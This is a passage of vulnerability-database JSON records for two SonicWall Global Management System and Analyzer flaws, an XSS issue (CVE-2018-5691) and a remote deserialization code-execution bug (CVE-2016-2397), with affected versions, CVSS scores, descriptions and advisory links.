"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201801-1670",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "global management system",
"scope": "gte",
"trust": 1.0,
"vendor": "sonicwall",
"version": "8.1"
},
{
"model": "analyzer",
"scope": "lte",
"trust": 1.0,
"vendor": "sonicwall",
"version": "8.4"
},
{
"model": "analyzer",
"scope": "gte",
"trust": 1.0,
"vendor": "sonicwall",
"version": "7.0"
},
{
"model": "global management system",
"scope": "lte",
"trust": 1.0,
"vendor": "sonicwall",
"version": "8.4"
},
{
"model": "analyzer",
"scope": "lte",
"trust": 1.0,
"vendor": "sonicwall",
"version": "7.2"
},
{
"model": "global management system",
"scope": "gte",
"trust": 1.0,
"vendor": "sonicwall",
"version": "7.0"
},
{
"model": "global management system",
"scope": "lte",
"trust": 1.0,
"vendor": "sonicwall",
"version": "7.2"
},
{
"model": "analyzer",
"scope": "gte",
"trust": 1.0,
"vendor": "sonicwall",
"version": "8.1"
},
{
"model": "sonicwall global management system",
"scope": "eq",
"trust": 0.8,
"vendor": "dell",
"version": "8.1"
},
{
"model": "global management system",
"scope": "eq",
"trust": 0.6,
"vendor": "sonicwall",
"version": "8.1"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-001458"
},
{
"db": "NVD",
"id": "CVE-2018-5691"
},
{
"db": "CNNVD",
"id": "CNNVD-201801-458"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sonicwall:analyzer:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "8.4",
"versionStartIncluding": "8.1",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sonicwall:global_management_system:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "8.4",
"versionStartIncluding": "8.1",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sonicwall:analyzer:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "7.2",
"versionStartIncluding": "7.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sonicwall:global_management_system:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "7.2",
"versionStartIncluding": "7.0",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-5691"
}
]
},
"cve": "CVE-2018-5691",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "LOW",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 3.5,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2018-5691",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Low",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"exploitabilityScore": 6.8,
"id": "VHN-135723",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "LOW",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:S/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.4,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2018-5691",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "Low",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-5691",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201801-458",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-135723",
"trust": 0.1,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-135723"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-001458"
},
{
"db": "NVD",
"id": "CVE-2018-5691"
},
{
"db": "CNNVD",
"id": "CNNVD-201801-458"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SonicWall Global Management System (GMS) 8.1 has XSS via the `newName` and `Name` values of the `/sgms/TreeControl` module. The system enables rapid deployment and centralized management of Dell SonicWALL firewall, anti-spam, backup and recovery, and secure remote access solutions. A remote attacker can use the \u0027newName\u0027 and \u0027Name\u0027 values \u200b\u200bin the /sgms/TreeControl module to exploit this vulnerability to inject malicious script code into the web application of the SonicWall GMS device",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-5691"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-001458"
},
{
"db": "VULHUB",
"id": "VHN-135723"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-5691",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2018-001458",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201801-458",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-135723",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-135723"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-001458"
},
{
"db": "NVD",
"id": "CVE-2018-5691"
},
{
"db": "CNNVD",
"id": "CNNVD-201801-458"
}
]
},
"id": "VAR-201801-1670",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-135723"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T13:52:49.426000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SonicWall Global Management System (GMS) \u30b7\u30ea\u30fc\u30ba",
"trust": 0.8,
"url": "http://www.dell.com/jp/business/p/sonicwall-gms-series/pd"
},
{
"title": "Dell SonicWALL Global Management System Fixes for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=77704"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-001458"
},
{
"db": "CNNVD",
"id": "CNNVD-201801-458"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-135723"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-001458"
},
{
"db": "NVD",
"id": "CVE-2018-5691"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://www.vulnerability-lab.com/get_content.php?id=1819"
},
{
"trust": 1.7,
"url": "https://psirt.global.sonicwall.com/vuln-detail/snwlid-2018-0003"
},
{
"trust": 1.7,
"url": "http://documents.software.dell.com/sonicwall-gms-os/8.2/release-notes/known-issues?parentproduct=867"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-5691"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-5691"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-135723"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-001458"
},
{
"db": "NVD",
"id": "CVE-2018-5691"
},
{
"db": "CNNVD",
"id": "CNNVD-201801-458"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-135723"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-001458"
},
{
"db": "NVD",
"id": "CVE-2018-5691"
},
{
"db": "CNNVD",
"id": "CNNVD-201801-458"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-01-14T00:00:00",
"db": "VULHUB",
"id": "VHN-135723"
},
{
"date": "2018-02-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-001458"
},
{
"date": "2018-01-14T04:29:00.287000",
"db": "NVD",
"id": "CVE-2018-5691"
},
{
"date": "2018-01-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201801-458"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-03-04T00:00:00",
"db": "VULHUB",
"id": "VHN-135723"
},
{
"date": "2018-02-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-001458"
},
{
"date": "2019-03-04T18:19:37.253000",
"db": "NVD",
"id": "CVE-2018-5691"
},
{
"date": "2019-03-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201801-458"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201801-458"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SonicWall Global Management System Vulnerable to cross-site scripting",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-001458"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201801-458"
}
],
"trust": 0.6
}
}
var-201602-0123
Vulnerability from variot
The cliserver implementation in Dell SonicWALL GMS, Analyzer, and UMA EM5000 7.2, 8.0, and 8.1 before Hotfix 168056 allows remote attackers to deserialize and execute arbitrary Java code via crafted XML data. Supplementary information : CWE Vulnerability type by CWE-77: Improper Neutralization of Special Elements used in a Command ( Command injection ) Has been identified. An attacker can leverage this vulnerability to execute arbitrary code under the context of root. Multiple Dell SonicWALL Products are prone to a remote code-execution vulnerability. Successful exploitation can completely compromise the vulnerable device. The following products are vulnerable: Dell SonicWALL Global Management System Dell SonicWALL Analyzer Dell SonicWALL Universal Managemnet Appliance NOTE: This BID is being retired as it is a duplicate of BID 83200 (Multiple Dell SonicWALL Products Multiple Remote Code Execution Vulnerabilities). GMS is a global management system for rapid deployment and centralized management of SonicWALL infrastructure. Analyzer is a set of network analyzer software for SonicWALL infrastructure. UMA EM5000 is a set of general management equipment software
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201602-0123",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "uma em5000",
"scope": "eq",
"trust": 1.6,
"vendor": "sonicwall",
"version": "8.0"
},
{
"model": "global management system",
"scope": "eq",
"trust": 1.6,
"vendor": "sonicwall",
"version": "8.0"
},
{
"model": "uma em5000",
"scope": "eq",
"trust": 1.6,
"vendor": "sonicwall",
"version": "7.2"
},
{
"model": "global management system",
"scope": "eq",
"trust": 1.6,
"vendor": "sonicwall",
"version": "7.2"
},
{
"model": "analyzer",
"scope": "eq",
"trust": 1.6,
"vendor": "sonicwall",
"version": "8.1"
},
{
"model": "global management system",
"scope": "eq",
"trust": 1.6,
"vendor": "sonicwall",
"version": "8.1"
},
{
"model": "analyzer",
"scope": "eq",
"trust": 1.6,
"vendor": "sonicwall",
"version": "8.0"
},
{
"model": "analyzer",
"scope": "eq",
"trust": 1.6,
"vendor": "sonicwall",
"version": "7.2"
},
{
"model": "uma em5000",
"scope": "eq",
"trust": 1.6,
"vendor": "sonicwall",
"version": "8.1"
},
{
"model": "sonicwall global management system",
"scope": "eq",
"trust": 1.1,
"vendor": "dell",
"version": "8.0"
},
{
"model": "sonicwall global management system",
"scope": "eq",
"trust": 1.1,
"vendor": "dell",
"version": "7.2"
},
{
"model": "sonicwall analyzer",
"scope": "eq",
"trust": 1.1,
"vendor": "dell",
"version": "8.0"
},
{
"model": "sonicwall analyzer",
"scope": "eq",
"trust": 1.1,
"vendor": "dell",
"version": "7.2"
},
{
"model": "sonicwall global management system",
"scope": "eq",
"trust": 0.8,
"vendor": "dell",
"version": "8.1 hotfix 168056"
},
{
"model": "sonicwall analyzer",
"scope": "eq",
"trust": 0.8,
"vendor": "dell",
"version": "8.1 hotfix 168056"
},
{
"model": "sonicwall global management system",
"scope": "lt",
"trust": 0.8,
"vendor": "dell",
"version": "8.1"
},
{
"model": "sonicwall e-class universal management appliance em5000",
"scope": null,
"trust": 0.8,
"vendor": "dell",
"version": null
},
{
"model": "sonicwall analyzer",
"scope": "lt",
"trust": 0.8,
"vendor": "dell",
"version": "8.1"
},
{
"model": "sonicwall e-class universal management appliance em5000",
"scope": "eq",
"trust": 0.8,
"vendor": "dell",
"version": "7.2"
},
{
"model": "sonicwall e-class universal management appliance em5000",
"scope": "eq",
"trust": 0.8,
"vendor": "dell",
"version": "8.1 hotfix 168056"
},
{
"model": "sonicwall e-class universal management appliance em5000",
"scope": "lt",
"trust": 0.8,
"vendor": "dell",
"version": "8.1"
},
{
"model": "sonicwall e-class universal management appliance em5000",
"scope": "eq",
"trust": 0.8,
"vendor": "dell",
"version": "8.0"
},
{
"model": "gms virtual appliance",
"scope": null,
"trust": 0.7,
"vendor": "sonicwall",
"version": null
},
{
"model": "sonicwall universal management appliance em5000",
"scope": "eq",
"trust": 0.3,
"vendor": "dell",
"version": "8.1"
},
{
"model": "sonicwall universal management appliance em5000",
"scope": "eq",
"trust": 0.3,
"vendor": "dell",
"version": "8.0"
},
{
"model": "sonicwall universal management appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "dell",
"version": "7.2"
},
{
"model": "sonicwall global management system",
"scope": "eq",
"trust": 0.3,
"vendor": "dell",
"version": "8.1"
},
{
"model": "sonicwall analyzer",
"scope": "eq",
"trust": 0.3,
"vendor": "dell",
"version": "8.1"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-16-163"
},
{
"db": "BID",
"id": "84882"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001704"
},
{
"db": "NVD",
"id": "CVE-2016-2397"
},
{
"db": "CNNVD",
"id": "CNNVD-201602-323"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:sonicwall:uma_em5000_firmware:8.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:sonicwall:uma_em5000_firmware:8.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:sonicwall:uma_em5000_firmware:7.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:sonicwall:uma_em5000:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sonicwall:global_management_system:7.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sonicwall:global_management_system:8.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sonicwall:global_management_system:8.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sonicwall:analyzer:8.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sonicwall:analyzer:7.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sonicwall:analyzer:8.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2016-2397"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "cpnrodzc7",
"sources": [
{
"db": "ZDI",
"id": "ZDI-16-163"
}
],
"trust": 0.7
},
"cve": "CVE-2016-2397",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2016-2397",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 1.6,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-91216",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2016-2397",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2016-2397",
"trust": 0.8,
"value": "High"
},
{
"author": "ZDI",
"id": "CVE-2016-2397",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201602-323",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-91216",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2016-2397",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-16-163"
},
{
"db": "VULHUB",
"id": "VHN-91216"
},
{
"db": "VULMON",
"id": "CVE-2016-2397"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001704"
},
{
"db": "NVD",
"id": "CVE-2016-2397"
},
{
"db": "CNNVD",
"id": "CNNVD-201602-323"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The cliserver implementation in Dell SonicWALL GMS, Analyzer, and UMA EM5000 7.2, 8.0, and 8.1 before Hotfix 168056 allows remote attackers to deserialize and execute arbitrary Java code via crafted XML data. Supplementary information : CWE Vulnerability type by CWE-77: Improper Neutralization of Special Elements used in a Command ( Command injection ) Has been identified. An attacker can leverage this vulnerability to execute arbitrary code under the context of root. Multiple Dell SonicWALL Products are prone to a remote code-execution vulnerability. Successful exploitation can completely compromise the vulnerable device. \nThe following products are vulnerable:\nDell SonicWALL Global Management System\nDell SonicWALL Analyzer\nDell SonicWALL Universal Managemnet Appliance\nNOTE: This BID is being retired as it is a duplicate of BID 83200 (Multiple Dell SonicWALL Products Multiple Remote Code Execution Vulnerabilities). GMS is a global management system for rapid deployment and centralized management of SonicWALL infrastructure. Analyzer is a set of network analyzer software for SonicWALL infrastructure. UMA EM5000 is a set of general management equipment software",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-2397"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001704"
},
{
"db": "ZDI",
"id": "ZDI-16-163"
},
{
"db": "BID",
"id": "84882"
},
{
"db": "VULHUB",
"id": "VHN-91216"
},
{
"db": "VULMON",
"id": "CVE-2016-2397"
}
],
"trust": 2.7
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "ZDI",
"id": "ZDI-16-163",
"trust": 3.6
},
{
"db": "NVD",
"id": "CVE-2016-2397",
"trust": 3.3
},
{
"db": "SECTRACK",
"id": "1035015",
"trust": 1.2
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001704",
"trust": 0.8
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-3137",
"trust": 0.7
},
{
"db": "CNNVD",
"id": "CNNVD-201602-323",
"trust": 0.7
},
{
"db": "BID",
"id": "84882",
"trust": 0.3
},
{
"db": "VULHUB",
"id": "VHN-91216",
"trust": 0.1
},
{
"db": "BID",
"id": "83200",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2016-2397",
"trust": 0.1
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-16-163"
},
{
"db": "VULHUB",
